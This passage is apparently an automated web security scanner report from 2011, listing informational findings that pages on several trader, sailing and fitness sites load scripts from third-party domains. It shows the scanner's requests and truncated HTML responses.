<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1238. http://www.pwc-traderonline.com/research/resources/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc-traderonline.com
Path:	/research/resources/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /research/resources/ HTTP/1.1
Host: www.pwc-traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:00 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 21995



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Personal Watercraft Resources: Finance, Insurance, Transport and More - PWC-Tra
...[SNIP]...
en" type="text/css" href="/css/pwc-css.php?pageName=resources" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1239. http://www.pwc-traderonline.com/sell/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc-traderonline.com
Path:	/sell/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /sell/ HTTP/1.1
Host: www.pwc-traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:59 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 26574



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sell Your New or Used Personal Watercraft - PWC-TraderOnline.com</title>

...[SNIP]...
"screen" type="text/css" href="/css/pwc-css.php?pageName=sell" />

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1240. http://www.roomsaver.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.roomsaver.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.ispeakvideo.com/scripts/iSpeakVideo.js

Request

GET / HTTP/1.1
Host: www.roomsaver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 00:09:04 GMT
Server: Apache
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=8tjbv0o18kobn9bckebm33vd32; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" x
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=roomsaver"></script>
...[SNIP]...
</script>
<script src="http://www.ispeakvideo.com/scripts/iSpeakVideo.js"
type="text/javascript" language="javascript" ></script>
...[SNIP]...
</div>
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
...[SNIP]...

21.1241. http://www.rvtraderonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rvtraderonline.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.rvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:08 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:09:09 GMT
Connection: close
Content-Type: text/html
Content-Length: 87669

<!DOCTYPE html>
<html>
<head>
   <title>RV Trader.. - RVs - Fleetwood, Airstream, Winnebago, Keystone, Forest River, Newmar RVs and More - RVTrader.com</title>
   <meta http-equiv
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1242. http://www.rvtraderonline.com/research/resources/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rvtraderonline.com
Path:	/research/resources/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /research/resources/ HTTP/1.1
Host: www.rvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:15 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 23240



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>RV Resources - RVTraderOnline.com</title>
<meta name="description" content="Find crit
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1243. http://www.rvtraderonline.com/sell/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rvtraderonline.com
Path:	/sell/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /sell/ HTTP/1.1
Host: www.rvtraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:10 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 23177



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sell your RV on RV Trader</title>
<meta name="description" content="Sell your new or
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1244. http://www.sailinganarchy.com/ADs/nauticexpo/nauticexpo.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/ADs/nauticexpo/nauticexpo.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js
http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js
http://static.nauticexpo.com/static/js/societe.m.cdn15.js

Request

GET /ADs/nauticexpo/nauticexpo.htm HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:42 GMT
Server: Apache
Last-Modified: Thu, 19 Nov 2009 23:43:14 GMT
ETag: "34a303-85e6-ec38a880"
Accept-Ranges: bytes
Content-Length: 34278
Vary: User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>
Sailboats, Catamarans, Sailing dinghies, Mainsails, Drysuits - NauticExpo </title>

...[SNIP]...

<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/lightbox.m.cdn10.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/fenetre.class.m.cdn12.js" type="text/javascript"></script>


<script src="http://static.nauticexpo.com/static/js/societe.m.cdn15.js" type="text/javascript"></script>
...[SNIP]...

21.1245. http://www.sailinganarchy.com/breymaiersailing.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/breymaiersailing.com

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /breymaiersailing.com HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:28:42 GMT
Server: Apache
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 1984

<html>
<head>
<title>NetHere: URL Not Found (404)</title>
<link rev="made" href="mailto:webmaster@sailinganarchy.com">
<style>
a:link {
color : #092769;
}
a:visited {
color : #092769;

...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1246. http://www.sailinganarchy.com/calendar/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/calendar/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.afy11.net/srad.js?azId=1000000238007
http://ad.afy11.net/srad.js?azId=1000000238307
http://edge.quantserve.com/quant.js

Request

GET /calendar/index.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:42 GMT
Server: Apache
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 67338

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charse
...[SNIP]...
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238307">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://ad.afy11.net/srad.js?azId=1000000238007">
</script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.1247. http://www.sailinganarchy.com/editor/audio_video.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/editor/audio_video.php

Issue detail

The response dynamically includes the following script from another domain:

http://ad.afy11.net/srad.js?azId=1000000238307

Request

GET /editor/audio_video.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:43 GMT
Server: Apache
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 122549

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Sailin News and
...[SNIP]...
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238307">
</script>
...[SNIP]...

21.1248. http://www.sailinganarchy.com/editor/pimpin.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/editor/pimpin.php

Issue detail

The response dynamically includes the following script from another domain:

http://ad.afy11.net/srad.js?azId=1000000238307

Request

GET /editor/pimpin.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1249. http://www.sailinganarchy.com/index_page1.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/index_page1.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.afy11.net/srad.js?azId=1000000238007
http://ad.afy11.net/srad.js?azId=1000000238107
http://ad.afy11.net/srad.js?azId=1000000238307
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /index_page1.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:45 GMT
Server: Apache
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 112556

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="ke
...[SNIP]...
</script>
       <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238307">
       </script>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238107">
           </script>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238107">
           </script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://ad.afy11.net/srad.js?azId=1000000238007">
</script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.1250. http://www.sailinganarchy.com/index_page2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/index_page2.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.afy11.net/srad.js?azId=1000000238007
http://ad.afy11.net/srad.js?azId=1000000238107
http://ad.afy11.net/srad.js?azId=1000000238307
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /index_page2.php HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:45 GMT
Server: Apache
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 97764

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="ke
...[SNIP]...
</script>
       <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238307">
       </script>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238107">
           </script>
...[SNIP]...
</script>
           <script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=1000000238107">
           </script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://ad.afy11.net/srad.js?azId=1000000238007">
</script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.1251. http://www.sailinganarchy.com/none previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/none

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /none HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 02:28:46 GMT
Server: Apache
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 1984

<html>
<head>
<title>NetHere: URL Not Found (404)</title>
<link rev="made" href="mailto:webmaster@sailinganarchy.com">
<style>
a:link {
color : #092769;
}
a:visited {
color : #092769;

...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1252. http://www.shape.com/workouts/articles/blood_sugar.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/blood_sugar.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js
http://serve.a-widget.com/kickFlash/scripts/swfobject2.js

Request

GET /workouts/articles/blood_sugar.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Apache
Cache-Control: max-age=900
Location: http://www.shape.com/workouts/articles/blood-sugar.html
X-Server-Name: (null)
ETag: "1295922530"
Last-Modified: Tue, 25 Jan 2011 02:28:50 +0000
X-Powered-By: PHP/5.2.13
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:43:49 GMT
Content-Type: text/html; charset=utf-8
Age: 0
Via: 1.1 mdw107101 (MII-APC/1.6)
Connection: close
Content-Length: 27234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
</script>
<script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js"> </script>
...[SNIP]...

21.1253. http://www.shape.com/workouts/articles/workout_schedule.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shape.com
Path:	/workouts/articles/workout_schedule.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js
http://serve.a-widget.com/kickFlash/scripts/swfobject2.js

Request

GET /workouts/articles/workout_schedule.html HTTP/1.1
Host: www.shape.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 02:28:49 GMT
Server: Apache
Cache-Control: max-age=900
Location: http://www.shape.com/workouts/articles/workout-schedule.html
X-Server-Name: (null)
ETag: "1295922529"
Last-Modified: Tue, 25 Jan 2011 02:28:49 +0000
X-Powered-By: PHP/5.2.13
Via: HTTP/1.1 cdn.shape.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:43:49 GMT
Content-Type: text/html; charset=utf-8
Age: 0
Via: 1.1 mdw107101 (MII-APC/1.6)
Connection: close
Content-Length: 27239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com"
...[SNIP]...
</script>
<script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js"> </script>
...[SNIP]...

21.1254. http://www.snowmobiletraderonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.snowmobiletraderonline.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.snowmobiletraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:17 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Wed, 25-Jan-2012 00:09:18 GMT
Connection: close
Content-Type: text/html
Content-Length: 45649

<!DOCTYPE html>
<html>
<head>
   <title>Snowmobiles for Sale - Arctic Cat, Ski-Doo, and More - SnowmobileTraderOnline.com</title>
   <meta http-equiv="Cache-Control" content="no-c
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1255. http://www.snowmobiletraderonline.com/find/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.snowmobiletraderonline.com
Path:	/find/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /find/ HTTP/1.1
Host: www.snowmobiletraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:18 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 25143


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Search New and Used Snowmobiles at SnowmobileTraderOnline.com</title>
   <meta name="desc
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1256. http://www.snowmobiletraderonline.com/research/resources/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.snowmobiletraderonline.com
Path:	/research/resources/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /research/resources/ HTTP/1.1
Host: www.snowmobiletraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:21 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 21575


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Snowmobile Resources: Finance Insurance and More - SnowmobileTraderOnline.com</title>

...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1257. http://www.snowmobiletraderonline.com/sell/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.snowmobiletraderonline.com
Path:	/sell/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /sell/ HTTP/1.1
Host: www.snowmobiletraderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:09:19 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 26532


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Sell Your New or Used Snowmobile - SnowmobileTraderOnline.com</title>
   <meta name="desc
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.1258. http://www.soundingsonline.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123

Request

GET / HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1259. http://www.soundingsonline.com/about-us previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.soundingsonline.com
